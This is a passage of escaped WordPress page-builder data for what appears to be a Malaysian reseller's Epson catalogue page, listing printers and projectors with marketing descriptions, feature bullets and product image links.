lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the 